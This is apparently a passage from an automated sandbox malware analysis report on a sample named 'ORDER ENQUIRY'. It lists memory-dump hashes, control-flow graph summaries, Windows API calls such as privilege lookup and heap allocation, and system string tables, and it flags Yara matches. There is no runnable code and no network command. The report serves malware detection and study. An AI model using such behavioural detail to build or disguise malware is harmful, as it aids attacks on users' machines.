                                                                                                                                                                          • Opcode Fuzzy Hash: 159f5254c83419512b5514a1806c67b4c11f14a36bfe8d693edac6c92facc208
                                                                                                                                                                          • Instruction Fuzzy Hash: 5590023260180442D10575985408646040597E0341F55D051A502459AEC7658AD16231
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
                                                                                                                                                                          • Instruction ID: e6f1855a17781af26dec0b15052c4fa04d9ddb72a5f43a98e355ae6150167d38
                                                                                                                                                                          • Opcode Fuzzy Hash: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
                                                                                                                                                                          • Instruction Fuzzy Hash: D790023260188842D1157158840474A040597D0341F59C451A442469DDC7958AD17221
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
                                                                                                                                                                          • Instruction ID: 1336aab368ed1ba5b40453f04e8f27da38a4843bdc25962be64c934d0a189a7c
                                                                                                                                                                          • Opcode Fuzzy Hash: 163c28eaed26d21f741ee6b2064e37363cd6a670ae6254c2151c5b420156ae44
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E900222A01800824145716888449064405BBE1251755C161A0998595DC6598AA55765
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
                                                                                                                                                                          • Instruction ID: e3d722858902d8bb0b2818b5d445f1c80ac136f3e5b8bed2622549d44c60200e
                                                                                                                                                                          • Opcode Fuzzy Hash: a65e50270daa2bb95435b3c58ee2dd5f4ef9af8c6dea53c00085e213f38ca63b
                                                                                                                                                                          • Instruction Fuzzy Hash: F9900232601C0442D1057158481470B040597D0342F55C051A116459ADC7258A916671
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
                                                                                                                                                                          • Instruction ID: 833ddf8ed4b81c7a396ddd0d2e2a803ca5e8e2b66eb9027f8d7c1340a86cc52f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ac0af7c958f8f0bdba1e2704fb4a5c01c964cfc1d59640d9d8470c9e53dcb91
                                                                                                                                                                          • Instruction Fuzzy Hash: 57900222611C0082D20575684C14B07040597D0343F55C155A0154599CCA158AA15621
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
                                                                                                                                                                          • Instruction ID: 14060e5e22a0f02ff0ed41e3075afa9906c756b2e3af70eeabba2b96cda46948
                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9cb88b942b682415916452ed00147050de33a9a4a7b6ebc32d11a252a15629
                                                                                                                                                                          • Instruction Fuzzy Hash: E190026274180482D10571584414B060405D7E1341F55C055E1064599DC719CE926226
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
                                                                                                                                                                          • Instruction ID: f98de20f1c0d4d2f4f9fcb468e5053ba30529a6935d88780b0236d6d76bee596
                                                                                                                                                                          • Opcode Fuzzy Hash: fcff8806188d88e013620f011c8621efccd10cbafd6440531641b1ebe061c072
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E90027260180442D14571584404746040597D0341F55C051A5064599EC7598FD56765
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
                                                                                                                                                                          • Instruction ID: 1caedc964de7fb8b4424711dd73c0e91aaaa538642a18c914ead6c804e2b9d9f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2bc9327e1e374a4245cadade8c0f0d1b42b9be55cb28bee0617ffdb3a3a24926
                                                                                                                                                                          • Instruction Fuzzy Hash: 51900222A0180542D10671584404616040A97D0281F95C062A102459AECB258BD2A231
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                                                                                                                          • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                                                                                                                          • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 9 41a620-41a651 call 41af50 RtlAllocateHeap
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID: &EA
                                                                                                                                                                          • API String ID: 1279760036-1330915590
                                                                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                          • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                          • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 207 408308-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 216 40835c-40836e PostThreadMessageW 207->216 217 40838e-408392 207->217 218 408370-40838a call 40a470 216->218 219 40838d 216->219 218->219 219->217
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                          • Opcode ID: 0cca15f02b617a7521befa122fa94ec674600ef9b2b0daaf6e6ce91175bef69b
                                                                                                                                                                          • Instruction ID: 470611dd28a873b78db0426f77af5a4d602ff93c2f93c66593f9dc5625664ae8
                                                                                                                                                                          • Opcode Fuzzy Hash: 0cca15f02b617a7521befa122fa94ec674600ef9b2b0daaf6e6ce91175bef69b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6701D871A8031877E720A6958C43FFF7B1C5B40B55F04415EFF04BA1C2D6E9690547EA

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 222 408310-40831f 223 408328-40835a call 41c9f0 call 40ace0 call 414e40 222->223 224 408323 call 41be50 222->224 231 40835c-40836e PostThreadMessageW 223->231 232 40838e-408392 223->232 224->223 233 408370-40838a call 40a470 231->233 234 40838d 231->234 233->234 234->232
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                          • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                                                                                                                          • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                                                                                                                                          • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                                                                                                                          • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 261 41a652-41a655 262 41a657-41a65e 261->262 263 41a66d-41a677 call 41af50 261->263 262->263 265 41a67c-41a691 RtlFreeHeap 263->265
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                          • Opcode ID: 64c43df1c5145697a011099cf4d5effccd4cd55dfc51a19ab4ae289822762346
                                                                                                                                                                          • Instruction ID: ab58f9fd6dd11ada3974d1572abae490446c9ea29d49f77d7c8d67bc790f3ce2
                                                                                                                                                                          • Opcode Fuzzy Hash: 64c43df1c5145697a011099cf4d5effccd4cd55dfc51a19ab4ae289822762346
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE0DFF92492449FC711EF65AC818AB7790AF81309318464EE89D47343D632D92686E6

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 266 41a660-41a676 267 41a67c-41a691 RtlFreeHeap 266->267 268 41a677 call 41af50 266->268 268->267
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                          • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                                                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                          • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 269 41a695-41a6c8 call 41af50 ExitProcess
                                                                                                                                                                          APIs
                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                          • Opcode ID: e64ffb56dd947b0bb967b0ba6fb0e7f1011988acc4ba440c63e82543c5f24ce3
                                                                                                                                                                          • Instruction ID: df653f655f34d755fa6f4cbab6b9e4262b4fc2d95fa75ca97e3f66e86f9797c3
                                                                                                                                                                          • Opcode Fuzzy Hash: e64ffb56dd947b0bb967b0ba6fb0e7f1011988acc4ba440c63e82543c5f24ce3
                                                                                                                                                                          • Instruction Fuzzy Hash: B5E02C312002047FCB20EF68CC86FCB3BA88F19394F008268F81CAB282C131A600CAE1
                                                                                                                                                                          APIs
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                          • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                                                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                                                                                                                                                          APIs
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                          • Opcode ID: 9a27bee001199bf1dabcb3458cc3aca9529968407b8229d8826ee980f40a67cc
                                                                                                                                                                          • Instruction ID: 7fdf8e8b7e5be2e70791ab513ae4a640a17de0c82418153196c178a81fd18c5d
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a27bee001199bf1dabcb3458cc3aca9529968407b8229d8826ee980f40a67cc
                                                                                                                                                                          • Instruction Fuzzy Hash: EAE09AB1200204ABCB10EF44CC85EE737A9EF88224F008094FE4C57242C630E8158BF5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                          • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                                                                                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                          • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 4293b01e6a8cf9ddca5b47cec5957ec832de4092bc543dbd5c5989e81f0dd20f
                                                                                                                                                                          • Instruction ID: 50d04c62b374d11386772dcbafa7f41cb499096691ee4a25885e43abf00dbcb7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4293b01e6a8cf9ddca5b47cec5957ec832de4092bc543dbd5c5989e81f0dd20f
                                                                                                                                                                          • Instruction Fuzzy Hash: E3B09B72D019C5C5DA16E7A446087177D00B7D0741F15C076E3030686F8738C5D1E275
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                                          • Opcode ID: 3831a6bfc5c4c1c82aad8308684bb770ba3b6fa275eb46452ba804d30a3f38bb
                                                                                                                                                                          • Instruction ID: 0e5cecdd8e18366f84e3e6fcdcd8d9599f797bbb638b21996633f4f8360501a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 3831a6bfc5c4c1c82aad8308684bb770ba3b6fa275eb46452ba804d30a3f38bb
                                                                                                                                                                          • Instruction Fuzzy Hash: EF928D71608742AFE729DE29C880B6BB7E8FF84750F0449ADFA94D7250D770E854CB92
                                                                                                                                                                          Strings
                                                                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254CE
                                                                                                                                                                          • Critical section address, xrefs: 01B25425, 01B254BC, 01B25534
                                                                                                                                                                          • Address of the debug info found in the active list., xrefs: 01B254AE, 01B254FA
                                                                                                                                                                          • undeleted critical section in freed memory, xrefs: 01B2542B
                                                                                                                                                                          • Invalid debug info address of this critical section, xrefs: 01B254B6
                                                                                                                                                                          • corrupted critical section, xrefs: 01B254C2
                                                                                                                                                                          • Critical section debug info address, xrefs: 01B2541F, 01B2552E
                                                                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254E2
                                                                                                                                                                          • double initialized or corrupted critical section, xrefs: 01B25508
                                                                                                                                                                          • Thread identifier, xrefs: 01B2553A
                                                                                                                                                                          • Critical section address., xrefs: 01B25502
                                                                                                                                                                          • 8, xrefs: 01B252E3
                                                                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01B25543
                                                                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B2540A, 01B25496, 01B25519
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                          • API String ID: 0-2368682639
                                                                                                                                                                          • Opcode ID: 987cef01669a52191d287115a770f3233426c8590437544d3b0df089f19d24a6
                                                                                                                                                                          • Instruction ID: 0457984c24a7c56d01f75ba2d983e1259b2e966d66469f8043b67aaa25fdcfaf
                                                                                                                                                                          • Opcode Fuzzy Hash: 987cef01669a52191d287115a770f3233426c8590437544d3b0df089f19d24a6
                                                                                                                                                                          • Instruction Fuzzy Hash: F58178B0A00358AFDF24CF99C945BAEBBF5FB49714F104159E508BB281D379A985CBA0
                                                                                                                                                                          Strings
                                                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B224C0
                                                                                                                                                                          • @, xrefs: 01B2259B
                                                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B22412
                                                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B22602
                                                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B222E4
                                                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B2261F
                                                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B22624
                                                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B22498
                                                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B22506
                                                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B22409
                                                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B225EB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                          • API String ID: 0-4009184096
                                                                                                                                                                          • Opcode ID: 50ae7d04bf3adf37081695f30500e35bbbc019dc20ba0cd6c57a3204c34b1c6c
                                                                                                                                                                          • Instruction ID: 84dfca48ae304f06bdc26687896972f9ec178eda957ea46a0714099b70197fb4
                                                                                                                                                                          • Opcode Fuzzy Hash: 50ae7d04bf3adf37081695f30500e35bbbc019dc20ba0cd6c57a3204c34b1c6c
                                                                                                                                                                          • Instruction Fuzzy Hash: 74027FF1D002299BDB35DB54CD84BAAB7B8AF54304F4441DAE70DA7241DB309E98CF69
